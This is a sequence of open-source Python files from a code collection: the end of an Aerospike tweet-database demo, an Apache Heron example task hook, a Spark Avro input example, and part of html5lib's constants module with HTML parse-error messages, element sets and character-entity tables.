tweetQuery = self.client.query("test", "tweets")
#tweetQuery.select('username')
# callback for each record read
def tweetQueryCallback((key, meta, record)):
print(record["tweet"])
# invoke the operations, and for each record invoke the callback
tweetQuery.where(p.equals('username',username))
tweetQuery.foreach(tweetQueryCallback)
except Exception as e :
print("error: {0}".format(e), file=sys.stderr)
def queryUsersByTweetCount(self):
print("\n********** Query Users By Tweet Count Range **********\n")
# Get username
try:
self.client.index_integer_create(None, "test", "users", "tweetcount", "tweetcount_index")
time.sleep(5)
print("\nINFO: Integer Secondary Index Created ")
min = int(raw_input("Enter Min Tweet Count: "))
max = int(raw_input("Enter Max Tweet Count: "))
print("\nList of users with " , min , "-" , max , " tweets:\n")
tweetQuery = self.client.query("test", "users")
#tweetQuery.select('username')
# callback for each record read
def tweetQueryCountCallback((key, meta, record)):
print(record["username"] , " has " , record["tweetcount"] , " tweets\n")
# invoke the operations, and for each record invoke the callback
tweetQuery.where(p.between('tweetcount',min,max))
tweetQuery.foreach(tweetQueryCountCallback)
except Exception as e :
print("error: {0}".format(e), file=sys.stderr)
def getTimeStamp(self):
""" generated source for method getTimeStamp """
return int(round(time.time() * 1000))
def createTweets(self):
randomTweets = ["For just $1 you get a half price download of half of the song and listen to it just once.", "People tell me my body looks like a melted candle", "Come on movie! Make it start!", "Byaaaayy", "Please, please, win! Meow, meow, meow!", "Put. A. Bird. On. It.", "A weekend wasted is a weekend well spent", "Would you like to super spike your meal?", "We have a mean no-no-bring-bag up here on aisle two.", "SEEK: See, Every, EVERY, Kind... of spot", "We can order that for you. It will take a year to get there.", "If you are pregnant, have a soda.", "Hear that snap? Hear that clap?", "Follow me and I may follow you", "Which is the best cafe in Portland? Discuss...", "Portland Coffee is for closers!", "Lets get this party started!", "How about them portland blazers!", "You got school'd, yo", "I love animals", "I love my dog", "What's up Portland", "Which is the best cafe in Portland? Discuss...", "I dont always tweet, but when I do it is on Tweetaspike"]
totalUsers = 10000
maxTweets = 20
username = str()
ts = 0
wr_policy = {
AS_POLICY_W_EXISTS: AS_POLICY_EXISTS_IGNORE
}
print("\nCreate up to " , maxTweets , " tweets each for " , totalUsers , " users. Press any key to continue...\n")
raw_input("..")
j = 0
while j < totalUsers:
username = "user" + str(random.randint(1,totalUsers))
userKey = ("test", "users", username)
meta = None
policy = None
ts = None
k = 0
(key, metadata,userRecord) = self.client.get(userKey,policy)
if userRecord:
totalTweets = random.randint(1,maxTweets)
while k <= totalTweets:
record = {}
ts = self.getTimeStamp()
tweetKey = ("test", "tweets", username + ":" + str(k))
record["tweet"] = random.choice(randomTweets)
record["ts"] = ts
record["username"]= username
self.client.put(tweetKey,record, meta, wr_policy)
k += 1
# Create timestamp to store along with the tweet so we can
# query, index and report on it
print("\nWrote " , totalTweets , " tweets for " , username , "!")
if totalTweets > 0:
# Update tweet count and last tweet'd timestamp in the user
# record
self.updateUser(self.client, userKey, wr_policy, ts, totalTweets)
j += 1
# Check if user record exists
# create up to maxTweets random tweets for this user
# Create timestamp to store along with the tweet so we can
# query, index and report on it
# Update tweet count and last tweet'd timestamp in the user
# record
print("\n\nDone creating up to " , maxTweets , " tweets each for " , totalUsers , " users!\n")
| mit |
wangli1426/heron | heron/examples/src/python/misc/test_task_hook.py | 8 | 2350 | # Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''module for example task hook'''
from collections import Counter
from heron.common.src.python.utils.log import Log
from heron.common.src.python.utils.topology import ITaskHook
# pylint: disable=unused-argument
class TestTaskHook(ITaskHook):
"""TestTaskHook logs event information every 10000 times"""
CONST = 10000
def prepare(self, conf, context):
Log.info("In prepare of TestTaskHook")
self.counter = Counter()
# pylint: disable=no-self-use
def clean_up(self):
Log.info("In clean_up of TestTaskHook")
def emit(self, emit_info):
self.counter['emit'] += 1
if self.counter['emit'] % self.CONST == 0:
Log.info("TestTaskHook: emitted %s tuples" % str(self.counter['emit']))
def spout_ack(self, spout_ack_info):
self.counter['sp_ack'] += 1
if self.counter['sp_ack'] % self.CONST == 0:
Log.info("TestTaskHook: spout acked %s tuples" % str(self.counter['sp_ack']))
def spout_fail(self, spout_fail_info):
self.counter['sp_fail'] += 1
if self.counter['sp_fail'] % self.CONST == 0:
Log.info("TestTaskHook: spout failed %s tuples" % str(self.counter['sp_fail']))
def bolt_execute(self, bolt_execute_info):
self.counter['bl_exec'] += 1
if self.counter['bl_exec'] % self.CONST == 0:
Log.info("TestTaskHook: bolt executed %s tuples" % str(self.counter['bl_exec']))
def bolt_ack(self, bolt_ack_info):
self.counter['bl_ack'] += 1
if self.counter['bl_ack'] % self.CONST == 0:
Log.info("TestTaskHook: bolt acked %s tuples" % str(self.counter['bl_ack']))
def bolt_fail(self, bolt_fail_info):
self.counter['bl_fail'] += 1
if self.counter['bl_fail'] % self.CONST == 0:
Log.info("TestTaskHook: bolt failed %s tuples" % str(self.counter['bl_fail']))
| apache-2.0 |
guoxiaolongzte/spark | examples/src/main/python/avro_inputformat.py | 51 | 3170 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Read data file users.avro in local Spark distro:
$ cd $SPARK_HOME
$ ./bin/spark-submit --driver-class-path /path/to/example/jar \
> ./examples/src/main/python/avro_inputformat.py \
> examples/src/main/resources/users.avro
{u'favorite_color': None, u'name': u'Alyssa', u'favorite_numbers': [3, 9, 15, 20]}
{u'favorite_color': u'red', u'name': u'Ben', u'favorite_numbers': []}
To read name and favorite_color fields only, specify the following reader schema:
$ cat examples/src/main/resources/user.avsc
{"namespace": "example.avro",
"type": "record",
"name": "User",
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_color", "type": ["string", "null"]}
]
}
$ ./bin/spark-submit --driver-class-path /path/to/example/jar \
> ./examples/src/main/python/avro_inputformat.py \
> examples/src/main/resources/users.avro examples/src/main/resources/user.avsc
{u'favorite_color': None, u'name': u'Alyssa'}
{u'favorite_color': u'red', u'name': u'Ben'}
"""
from __future__ import print_function
import sys
from functools import reduce
from pyspark.sql import SparkSession
if __name__ == "__main__":
if len(sys.argv) != 2 and len(sys.argv) != 3:
print("""
Usage: avro_inputformat <data_file> [reader_schema_file]
Run with example jar:
./bin/spark-submit --driver-class-path /path/to/example/jar \
/path/to/examples/avro_inputformat.py <data_file> [reader_schema_file]
Assumes you have Avro data stored in <data_file>. Reader schema can be optionally specified
in [reader_schema_file].
""", file=sys.stderr)
sys.exit(-1)
path = sys.argv[1]
spark = SparkSession\
.builder\
.appName("AvroKeyInputFormat")\
.getOrCreate()
sc = spark.sparkContext
conf = None
if len(sys.argv) == 3:
schema_rdd = sc.textFile(sys.argv[2], 1).collect()
conf = {"avro.schema.input.key": reduce(lambda x, y: x + y, schema_rdd)}
avro_rdd = sc.newAPIHadoopFile(
path,
"org.apache.avro.mapreduce.AvroKeyInputFormat",
"org.apache.avro.mapred.AvroKey",
"org.apache.hadoop.io.NullWritable",
keyConverter="org.apache.spark.examples.pythonconverters.AvroWrapperToJavaConverter",
conf=conf)
output = avro_rdd.map(lambda x: x[0]).collect()
for k in output:
print(k)
spark.stop()
| apache-2.0 |
dpendl00/headphones | lib/html5lib/constants.py | 963 | 87346 | from __future__ import absolute_import, division, unicode_literals
import string
import gettext
_ = gettext.gettext
EOF = None
E = {
"null-character":
_("Null character in input stream, replaced with U+FFFD."),
"invalid-codepoint":
_("Invalid codepoint in stream."),
"incorrectly-placed-solidus":
_("Solidus (/) incorrectly placed in tag."),
"incorrect-cr-newline-entity":
_("Incorrect CR newline entity, replaced with LF."),
"illegal-windows-1252-entity":
_("Entity used with illegal number (windows-1252 reference)."),
"cant-convert-numeric-entity":
_("Numeric entity couldn't be converted to character "
"(codepoint U+%(charAsInt)08x)."),
"illegal-codepoint-for-numeric-entity":
_("Numeric entity represents an illegal codepoint: "
"U+%(charAsInt)08x."),
"numeric-entity-without-semicolon":
_("Numeric entity didn't end with ';'."),
"expected-numeric-entity-but-got-eof":
_("Numeric entity expected. Got end of file instead."),
"expected-numeric-entity":
_("Numeric entity expected but none found."),
"named-entity-without-semicolon":
_("Named entity didn't end with ';'."),
"expected-named-entity":
_("Named entity expected. Got none."),
"attributes-in-end-tag":
_("End tag contains unexpected attributes."),
'self-closing-flag-on-end-tag':
_("End tag contains unexpected self-closing flag."),
"expected-tag-name-but-got-right-bracket":
_("Expected tag name. Got '>' instead."),
"expected-tag-name-but-got-question-mark":
_("Expected tag name. Got '?' instead. (HTML doesn't "
"support processing instructions.)"),
"expected-tag-name":
_("Expected tag name. Got something else instead"),
"expected-closing-tag-but-got-right-bracket":
_("Expected closing tag. Got '>' instead. Ignoring '</>'."),
"expected-closing-tag-but-got-eof":
_("Expected closing tag. Unexpected end of file."),
"expected-closing-tag-but-got-char":
_("Expected closing tag. Unexpected character '%(data)s' found."),
"eof-in-tag-name":
_("Unexpected end of file in the tag name."),
"expected-attribute-name-but-got-eof":
_("Unexpected end of file. Expected attribute name instead."),
"eof-in-attribute-name":
_("Unexpected end of file in attribute name."),
"invalid-character-in-attribute-name":
_("Invalid character in attribute name"),
"duplicate-attribute":
_("Dropped duplicate attribute on tag."),
"expected-end-of-tag-name-but-got-eof":
_("Unexpected end of file. Expected = or end of tag."),
"expected-attribute-value-but-got-eof":
_("Unexpected end of file. Expected attribute value."),
"expected-attribute-value-but-got-right-bracket":
_("Expected attribute value. Got '>' instead."),
'equals-in-unquoted-attribute-value':
_("Unexpected = in unquoted attribute"),
'unexpected-character-in-unquoted-attribute-value':
_("Unexpected character in unquoted attribute"),
"invalid-character-after-attribute-name":
_("Unexpected character after attribute name."),
"unexpected-character-after-attribute-value":
_("Unexpected character after attribute value."),
"eof-in-attribute-value-double-quote":
_("Unexpected end of file in attribute value (\")."),
"eof-in-attribute-value-single-quote":
_("Unexpected end of file in attribute value (')."),
"eof-in-attribute-value-no-quotes":
_("Unexpected end of file in attribute value."),
"unexpected-EOF-after-solidus-in-tag":
_("Unexpected end of file in tag. Expected >"),
"unexpected-character-after-solidus-in-tag":
_("Unexpected character after / in tag. Expected >"),
"expected-dashes-or-doctype":
_("Expected '--' or 'DOCTYPE'. Not found."),
"unexpected-bang-after-double-dash-in-comment":
_("Unexpected ! after -- in comment"),
"unexpected-space-after-double-dash-in-comment":
_("Unexpected space after -- in comment"),
"incorrect-comment":
_("Incorrect comment."),
"eof-in-comment":
_("Unexpected end of file in comment."),
"eof-in-comment-end-dash":
_("Unexpected end of file in comment (-)"),
"unexpected-dash-after-double-dash-in-comment":
_("Unexpected '-' after '--' found in comment."),
"eof-in-comment-double-dash":
_("Unexpected end of file in comment (--)."),
"eof-in-comment-end-space-state":
_("Unexpected end of file in comment."),
"eof-in-comment-end-bang-state":
_("Unexpected end of file in comment."),
"unexpected-char-in-comment":
_("Unexpected character in comment found."),
"need-space-after-doctype":
_("No space after literal string 'DOCTYPE'."),
"expected-doctype-name-but-got-right-bracket":
_("Unexpected > character. Expected DOCTYPE name."),
"expected-doctype-name-but-got-eof":
_("Unexpected end of file. Expected DOCTYPE name."),
"eof-in-doctype-name":
_("Unexpected end of file in DOCTYPE name."),
"eof-in-doctype":
_("Unexpected end of file in DOCTYPE."),
"expected-space-or-right-bracket-in-doctype":
_("Expected space or '>'. Got '%(data)s'"),
"unexpected-end-of-doctype":
_("Unexpected end of DOCTYPE."),
"unexpected-char-in-doctype":
_("Unexpected character in DOCTYPE."),
"eof-in-innerhtml":
_("XXX innerHTML EOF"),
"unexpected-doctype":
_("Unexpected DOCTYPE. Ignored."),
"non-html-root":
_("html needs to be the first start tag."),
"expected-doctype-but-got-eof":
_("Unexpected End of file. Expected DOCTYPE."),
"unknown-doctype":
_("Erroneous DOCTYPE."),
"expected-doctype-but-got-chars":
_("Unexpected non-space characters. Expected DOCTYPE."),
"expected-doctype-but-got-start-tag":
_("Unexpected start tag (%(name)s). Expected DOCTYPE."),
"expected-doctype-but-got-end-tag":
_("Unexpected end tag (%(name)s). Expected DOCTYPE."),
"end-tag-after-implied-root":
_("Unexpected end tag (%(name)s) after the (implied) root element."),
"expected-named-closing-tag-but-got-eof":
_("Unexpected end of file. Expected end tag (%(name)s)."),
"two-heads-are-not-better-than-one":
_("Unexpected start tag head in existing head. Ignored."),
"unexpected-end-tag":
_("Unexpected end tag (%(name)s). Ignored."),
"unexpected-start-tag-out-of-my-head":
_("Unexpected start tag (%(name)s) that can be in head. Moved."),
"unexpected-start-tag":
_("Unexpected start tag (%(name)s)."),
"missing-end-tag":
_("Missing end tag (%(name)s)."),
"missing-end-tags":
_("Missing end tags (%(name)s)."),
"unexpected-start-tag-implies-end-tag":
_("Unexpected start tag (%(startName)s) "
"implies end tag (%(endName)s)."),
"unexpected-start-tag-treated-as":
_("Unexpected start tag (%(originalName)s). Treated as %(newName)s."),
"deprecated-tag":
_("Unexpected start tag %(name)s. Don't use it!"),
"unexpected-start-tag-ignored":
_("Unexpected start tag %(name)s. Ignored."),
"expected-one-end-tag-but-got-another":
_("Unexpected end tag (%(gotName)s). "
"Missing end tag (%(expectedName)s)."),
"end-tag-too-early":
_("End tag (%(name)s) seen too early. Expected other end tag."),
"end-tag-too-early-named":
_("Unexpected end tag (%(gotName)s). Expected end tag (%(expectedName)s)."),
"end-tag-too-early-ignored":
_("End tag (%(name)s) seen too early. Ignored."),
"adoption-agency-1.1":
_("End tag (%(name)s) violates step 1, "
"paragraph 1 of the adoption agency algorithm."),
"adoption-agency-1.2":
_("End tag (%(name)s) violates step 1, "
"paragraph 2 of the adoption agency algorithm."),
"adoption-agency-1.3":
_("End tag (%(name)s) violates step 1, "
"paragraph 3 of the adoption agency algorithm."),
"adoption-agency-4.4":
_("End tag (%(name)s) violates step 4, "
"paragraph 4 of the adoption agency algorithm."),
"unexpected-end-tag-treated-as":
_("Unexpected end tag (%(originalName)s). Treated as %(newName)s."),
"no-end-tag":
_("This element (%(name)s) has no end tag."),
"unexpected-implied-end-tag-in-table":
_("Unexpected implied end tag (%(name)s) in the table phase."),
"unexpected-implied-end-tag-in-table-body":
_("Unexpected implied end tag (%(name)s) in the table body phase."),
"unexpected-char-implies-table-voodoo":
_("Unexpected non-space characters in "
"table context caused voodoo mode."),
"unexpected-hidden-input-in-table":
_("Unexpected input with type hidden in table context."),
"unexpected-form-in-table":
_("Unexpected form in table context."),
"unexpected-start-tag-implies-table-voodoo":
_("Unexpected start tag (%(name)s) in "
"table context caused voodoo mode."),
"unexpected-end-tag-implies-table-voodoo":
_("Unexpected end tag (%(name)s) in "
"table context caused voodoo mode."),
"unexpected-cell-in-table-body":
_("Unexpected table cell start tag (%(name)s) "
"in the table body phase."),
"unexpected-cell-end-tag":
_("Got table cell end tag (%(name)s) "
"while required end tags are missing."),
"unexpected-end-tag-in-table-body":
_("Unexpected end tag (%(name)s) in the table body phase. Ignored."),
"unexpected-implied-end-tag-in-table-row":
_("Unexpected implied end tag (%(name)s) in the table row phase."),
"unexpected-end-tag-in-table-row":
_("Unexpected end tag (%(name)s) in the table row phase. Ignored."),
"unexpected-select-in-select":
_("Unexpected select start tag in the select phase "
"treated as select end tag."),
"unexpected-input-in-select":
_("Unexpected input start tag in the select phase."),
"unexpected-start-tag-in-select":
_("Unexpected start tag token (%(name)s in the select phase. "
"Ignored."),
"unexpected-end-tag-in-select":
_("Unexpected end tag (%(name)s) in the select phase. Ignored."),
"unexpected-table-element-start-tag-in-select-in-table":
_("Unexpected table element start tag (%(name)s) in the select in table phase."),
"unexpected-table-element-end-tag-in-select-in-table":
_("Unexpected table element end tag (%(name)s) in the select in table phase."),
"unexpected-char-after-body":
_("Unexpected non-space characters in the after body phase."),
"unexpected-start-tag-after-body":
_("Unexpected start tag token (%(name)s)"
" in the after body phase."),
"unexpected-end-tag-after-body":
_("Unexpected end tag token (%(name)s)"
" in the after body phase."),
"unexpected-char-in-frameset":
_("Unexpected characters in the frameset phase. Characters ignored."),
"unexpected-start-tag-in-frameset":
_("Unexpected start tag token (%(name)s)"
" in the frameset phase. Ignored."),
"unexpected-frameset-in-frameset-innerhtml":
_("Unexpected end tag token (frameset) "
"in the frameset phase (innerHTML)."),
"unexpected-end-tag-in-frameset":
_("Unexpected end tag token (%(name)s)"
" in the frameset phase. Ignored."),
"unexpected-char-after-frameset":
_("Unexpected non-space characters in the "
"after frameset phase. Ignored."),
"unexpected-start-tag-after-frameset":
_("Unexpected start tag (%(name)s)"
" in the after frameset phase. Ignored."),
"unexpected-end-tag-after-frameset":
_("Unexpected end tag (%(name)s)"
" in the after frameset phase. Ignored."),
"unexpected-end-tag-after-body-innerhtml":
_("Unexpected end tag after body(innerHtml)"),
"expected-eof-but-got-char":
_("Unexpected non-space characters. Expected end of file."),
"expected-eof-but-got-start-tag":
_("Unexpected start tag (%(name)s)"
". Expected end of file."),
"expected-eof-but-got-end-tag":
_("Unexpected end tag (%(name)s)"
". Expected end of file."),
"eof-in-table":
_("Unexpected end of file. Expected table content."),
"eof-in-select":
_("Unexpected end of file. Expected select content."),
"eof-in-frameset":
_("Unexpected end of file. Expected frameset content."),
"eof-in-script-in-script":
_("Unexpected end of file. Expected script content."),
"eof-in-foreign-lands":
_("Unexpected end of file. Expected foreign content"),
"non-void-element-with-trailing-solidus":
_("Trailing solidus not allowed on element %(name)s"),
"unexpected-html-element-in-foreign-content":
_("Element %(name)s not allowed in a non-html context"),
"unexpected-end-tag-before-html":
_("Unexpected end tag (%(name)s) before html."),
"XXX-undefined-error":
_("Undefined error (this sucks and should be fixed)"),
}
namespaces = {
"html": "http://www.w3.org/1999/xhtml",
"mathml": "http://www.w3.org/1998/Math/MathML",
"svg": "http://www.w3.org/2000/svg",
"xlink": "http://www.w3.org/1999/xlink",
"xml": "http://www.w3.org/XML/1998/namespace",
"xmlns": "http://www.w3.org/2000/xmlns/"
}
scopingElements = frozenset((
(namespaces["html"], "applet"),
(namespaces["html"], "caption"),
(namespaces["html"], "html"),
(namespaces["html"], "marquee"),
(namespaces["html"], "object"),
(namespaces["html"], "table"),
(namespaces["html"], "td"),
(namespaces["html"], "th"),
(namespaces["mathml"], "mi"),
(namespaces["mathml"], "mo"),
(namespaces["mathml"], "mn"),
(namespaces["mathml"], "ms"),
(namespaces["mathml"], "mtext"),
(namespaces["mathml"], "annotation-xml"),
(namespaces["svg"], "foreignObject"),
(namespaces["svg"], "desc"),
(namespaces["svg"], "title"),
))
formattingElements = frozenset((
(namespaces["html"], "a"),
(namespaces["html"], "b"),
(namespaces["html"], "big"),
(namespaces["html"], "code"),
(namespaces["html"], "em"),
(namespaces["html"], "font"),
(namespaces["html"], "i"),
(namespaces["html"], "nobr"),
(namespaces["html"], "s"),
(namespaces["html"], "small"),
(namespaces["html"], "strike"),
(namespaces["html"], "strong"),
(namespaces["html"], "tt"),
(namespaces["html"], "u")
))
specialElements = frozenset((
(namespaces["html"], "address"),
(namespaces["html"], "applet"),
(namespaces["html"], "area"),
(namespaces["html"], "article"),
(namespaces["html"], "aside"),
(namespaces["html"], "base"),
(namespaces["html"], "basefont"),
(namespaces["html"], "bgsound"),
(namespaces["html"], "blockquote"),
(namespaces["html"], "body"),
(namespaces["html"], "br"),
(namespaces["html"], "button"),
(namespaces["html"], "caption"),
(namespaces["html"], "center"),
(namespaces["html"], "col"),
(namespaces["html"], "colgroup"),
(namespaces["html"], "command"),
(namespaces["html"], "dd"),
(namespaces["html"], "details"),
(namespaces["html"], "dir"),
(namespaces["html"], "div"),
(namespaces["html"], "dl"),
(namespaces["html"], "dt"),
(namespaces["html"], "embed"),
(namespaces["html"], "fieldset"),
(namespaces["html"], "figure"),
(namespaces["html"], "footer"),
(namespaces["html"], "form"),
(namespaces["html"], "frame"),
(namespaces["html"], "frameset"),
(namespaces["html"], "h1"),
(namespaces["html"], "h2"),
(namespaces["html"], "h3"),
(namespaces["html"], "h4"),
(namespaces["html"], "h5"),
(namespaces["html"], "h6"),
(namespaces["html"], "head"),
(namespaces["html"], "header"),
(namespaces["html"], "hr"),
(namespaces["html"], "html"),
(namespaces["html"], "iframe"),
# Note that image is commented out in the spec as "this isn't an
# element that can end up on the stack, so it doesn't matter,"
(namespaces["html"], "image"),
(namespaces["html"], "img"),
(namespaces["html"], "input"),
(namespaces["html"], "isindex"),
(namespaces["html"], "li"),
(namespaces["html"], "link"),
(namespaces["html"], "listing"),
(namespaces["html"], "marquee"),
(namespaces["html"], "menu"),
(namespaces["html"], "meta"),
(namespaces["html"], "nav"),
(namespaces["html"], "noembed"),
(namespaces["html"], "noframes"),
(namespaces["html"], "noscript"),
(namespaces["html"], "object"),
(namespaces["html"], "ol"),
(namespaces["html"], "p"),
(namespaces["html"], "param"),
(namespaces["html"], "plaintext"),
(namespaces["html"], "pre"),
(namespaces["html"], "script"),
(namespaces["html"], "section"),
(namespaces["html"], "select"),
(namespaces["html"], "style"),
(namespaces["html"], "table"),
(namespaces["html"], "tbody"),
(namespaces["html"], "td"),
(namespaces["html"], "textarea"),
(namespaces["html"], "tfoot"),
(namespaces["html"], "th"),
(namespaces["html"], "thead"),
(namespaces["html"], "title"),
(namespaces["html"], "tr"),
(namespaces["html"], "ul"),
(namespaces["html"], "wbr"),
(namespaces["html"], "xmp"),
(namespaces["svg"], "foreignObject")
))
htmlIntegrationPointElements = frozenset((
(namespaces["mathml"], "annotaion-xml"),
(namespaces["svg"], "foreignObject"),
(namespaces["svg"], "desc"),
(namespaces["svg"], "title")
))
mathmlTextIntegrationPointElements = frozenset((
(namespaces["mathml"], "mi"),
(namespaces["mathml"], "mo"),
(namespaces["mathml"], "mn"),
(namespaces["mathml"], "ms"),
(namespaces["mathml"], "mtext")
))
adjustForeignAttributes = {
"xlink:actuate": ("xlink", "actuate", namespaces["xlink"]),
"xlink:arcrole": ("xlink", "arcrole", namespaces["xlink"]),
"xlink:href": ("xlink", "href", namespaces["xlink"]),
"xlink:role": ("xlink", "role", namespaces["xlink"]),
"xlink:show": ("xlink", "show", namespaces["xlink"]),
"xlink:title": ("xlink", "title", namespaces["xlink"]),
"xlink:type": ("xlink", "type", namespaces["xlink"]),
"xml:base": ("xml", "base", namespaces["xml"]),
"xml:lang": ("xml", "lang", namespaces["xml"]),
"xml:space": ("xml", "space", namespaces["xml"]),
"xmlns": (None, "xmlns", namespaces["xmlns"]),
"xmlns:xlink": ("xmlns", "xlink", namespaces["xmlns"])
}
unadjustForeignAttributes = dict([((ns, local), qname) for qname, (prefix, local, ns) in
adjustForeignAttributes.items()])
spaceCharacters = frozenset((
"\t",
"\n",
"\u000C",
" ",
"\r"
))
tableInsertModeElements = frozenset((
"table",
"tbody",
"tfoot",
"thead",
"tr"
))
asciiLowercase = frozenset(string.ascii_lowercase)
asciiUppercase = frozenset(string.ascii_uppercase)
asciiLetters = frozenset(string.ascii_letters)
digits = frozenset(string.digits)
hexDigits = frozenset(string.hexdigits)
asciiUpper2Lower = dict([(ord(c), ord(c.lower()))
for c in string.ascii_uppercase])
# Heading elements need to be ordered
headingElements = (
"h1",
"h2",
"h3",
"h4",
"h5",
"h6"
)
voidElements = frozenset((
"base",
"command",
"event-source",
"link",
"meta",
"hr",
"br",
"img",
"embed",
"param",
"area",
"col",
"input",
"source",
"track"
))
cdataElements = frozenset(('title', 'textarea'))
rcdataElements = frozenset((
'style',
'script',
'xmp',
'iframe',
'noembed',
'noframes',
'noscript'
))
booleanAttributes = {
"": frozenset(("irrelevant",)),
"style": frozenset(("scoped",)),
"img": frozenset(("ismap",)),
"audio": frozenset(("autoplay", "controls")),
"video": frozenset(("autoplay", "controls")),
"script": frozenset(("defer", "async")),
"details": frozenset(("open",)),
"datagrid": frozenset(("multiple", "disabled")),
"command": frozenset(("hidden", "disabled", "checked", "default")),
"hr": frozenset(("noshade")),
"menu": frozenset(("autosubmit",)),
"fieldset": frozenset(("disabled", "readonly")),
"option": frozenset(("disabled", "readonly", "selected")),
"optgroup": frozenset(("disabled", "readonly")),
"button": frozenset(("disabled", "autofocus")),
"input": frozenset(("disabled", "readonly", "required", "autofocus", "checked", "ismap")),
"select": frozenset(("disabled", "readonly", "autofocus", "multiple")),
"output": frozenset(("disabled", "readonly")),
}
# entitiesWindows1252 has to be _ordered_ and needs to have an index. It
# therefore can't be a frozenset.
entitiesWindows1252 = (
8364, # 0x80 0x20AC EURO SIGN
65533, # 0x81 UNDEFINED
8218, # 0x82 0x201A SINGLE LOW-9 QUOTATION MARK
402, # 0x83 0x0192 LATIN SMALL LETTER F WITH HOOK
8222, # 0x84 0x201E DOUBLE LOW-9 QUOTATION MARK
8230, # 0x85 0x2026 HORIZONTAL ELLIPSIS
8224, # 0x86 0x2020 DAGGER
8225, # 0x87 0x2021 DOUBLE DAGGER
710, # 0x88 0x02C6 MODIFIER LETTER CIRCUMFLEX ACCENT
8240, # 0x89 0x2030 PER MILLE SIGN
352, # 0x8A 0x0160 LATIN CAPITAL LETTER S WITH CARON
8249, # 0x8B 0x2039 SINGLE LEFT-POINTING ANGLE QUOTATION MARK
338, # 0x8C 0x0152 LATIN CAPITAL LIGATURE OE
65533, # 0x8D UNDEFINED
381, # 0x8E 0x017D LATIN CAPITAL LETTER Z WITH CARON
65533, # 0x8F UNDEFINED
65533, # 0x90 UNDEFINED
8216, # 0x91 0x2018 LEFT SINGLE QUOTATION MARK
8217, # 0x92 0x2019 RIGHT SINGLE QUOTATION MARK
8220, # 0x93 0x201C LEFT DOUBLE QUOTATION MARK
8221, # 0x94 0x201D RIGHT DOUBLE QUOTATION MARK
8226, # 0x95 0x2022 BULLET
8211, # 0x96 0x2013 EN DASH
8212, # 0x97 0x2014 EM DASH
732, # 0x98 0x02DC SMALL TILDE
8482, # 0x99 0x2122 TRADE MARK SIGN
353, # 0x9A 0x0161 LATIN SMALL LETTER S WITH CARON
8250, # 0x9B 0x203A SINGLE RIGHT-POINTING ANGLE QUOTATION MARK
339, # 0x9C 0x0153 LATIN SMALL LIGATURE OE
65533, # 0x9D UNDEFINED
382, # 0x9E 0x017E LATIN SMALL LETTER Z WITH CARON
376 # 0x9F 0x0178 LATIN CAPITAL LETTER Y WITH DIAERESIS
)
xmlEntities = frozenset(('lt;', 'gt;', 'amp;', 'apos;', 'quot;'))
entities = {
"AElig": "\xc6",
"AElig;": "\xc6",
"AMP": "&",
"AMP;": "&",
"Aacute": "\xc1",
"Aacute;": "\xc1",
"Abreve;": "\u0102",
"Acirc": "\xc2",
"Acirc;": "\xc2",
"Acy;": "\u0410",
"Afr;": "\U0001d504",
"Agrave": "\xc0",
"Agrave;": "\xc0",
"Alpha;": "\u0391",
"Amacr;": "\u0100",
"And;": "\u2a53",
"Aogon;": "\u0104",
"Aopf;": "\U0001d538",
"ApplyFunction;": "\u2061",
"Aring": "\xc5",
"Aring;": "\xc5",
"Ascr;": "\U0001d49c",
"Assign;": "\u2254",
"Atilde": "\xc3",
"Atilde;": "\xc3",
"Auml": "\xc4",
"Auml;": "\xc4",
"Backslash;": "\u2216",
"Barv;": "\u2ae7",
"Barwed;": "\u2306",
"Bcy;": "\u0411",
"Because;": "\u2235",
"Bernoullis;": "\u212c",
"Beta;": "\u0392",
"Bfr;": "\U0001d505",
"Bopf;": "\U0001d539",
"Breve;": "\u02d8",
"Bscr;": "\u212c",
"Bumpeq;": "\u224e",
"CHcy;": "\u0427",
"COPY": "\xa9",
"COPY;": "\xa9",
"Cacute;": "\u0106",
"Cap;": "\u22d2",
"CapitalDifferentialD;": "\u2145",
"Cayleys;": "\u212d",
"Ccaron;": "\u010c",
"Ccedil": "\xc7",
"Ccedil;": "\xc7",
"Ccirc;": "\u0108",
"Cconint;": "\u2230",
"Cdot;": "\u010a",
"Cedilla;": "\xb8",
"CenterDot;": "\xb7",
"Cfr;": "\u212d",
"Chi;": "\u03a7",
"CircleDot;": "\u2299",
"CircleMinus;": "\u2296",
"CirclePlus;": "\u2295",
"CircleTimes;": "\u2297",
"ClockwiseContourIntegral;": "\u2232",
"CloseCurlyDoubleQuote;": "\u201d",
"CloseCurlyQuote;": "\u2019",
"Colon;": "\u2237",
"Colone;": "\u2a74",
"Congruent;": "\u2261",
"Conint;": "\u222f",
"ContourIntegral;": "\u222e",
"Copf;": "\u2102",
"Coproduct;": "\u2210",
"CounterClockwiseContourIntegral;": "\u2233",
"Cross;": "\u2a2f",
"Cscr;": "\U0001d49e",
"Cup;": "\u22d3",
"CupCap;": "\u224d",
"DD;": "\u2145",
"DDotrahd;": "\u2911",
"DJcy;": "\u0402",
"DScy;": "\u0405",
"DZcy;": "\u040f",
"Dagger;": "\u2021",
"Darr;": "\u21a1",
"Dashv;": "\u2ae4",
"Dcaron;": "\u010e",
"Dcy;": "\u0414",
"Del;": "\u2207",
"Delta;": "\u0394",
"Dfr;": "\U0001d507",
"DiacriticalAcute;": "\xb4",
"DiacriticalDot;": "\u02d9",
"DiacriticalDoubleAcute;": "\u02dd",
"DiacriticalGrave;": "`",
"DiacriticalTilde;": "\u02dc",
"Diamond;": "\u22c4",
"DifferentialD;": "\u2146",
"Dopf;": "\U0001d53b",
"Dot;": "\xa8",
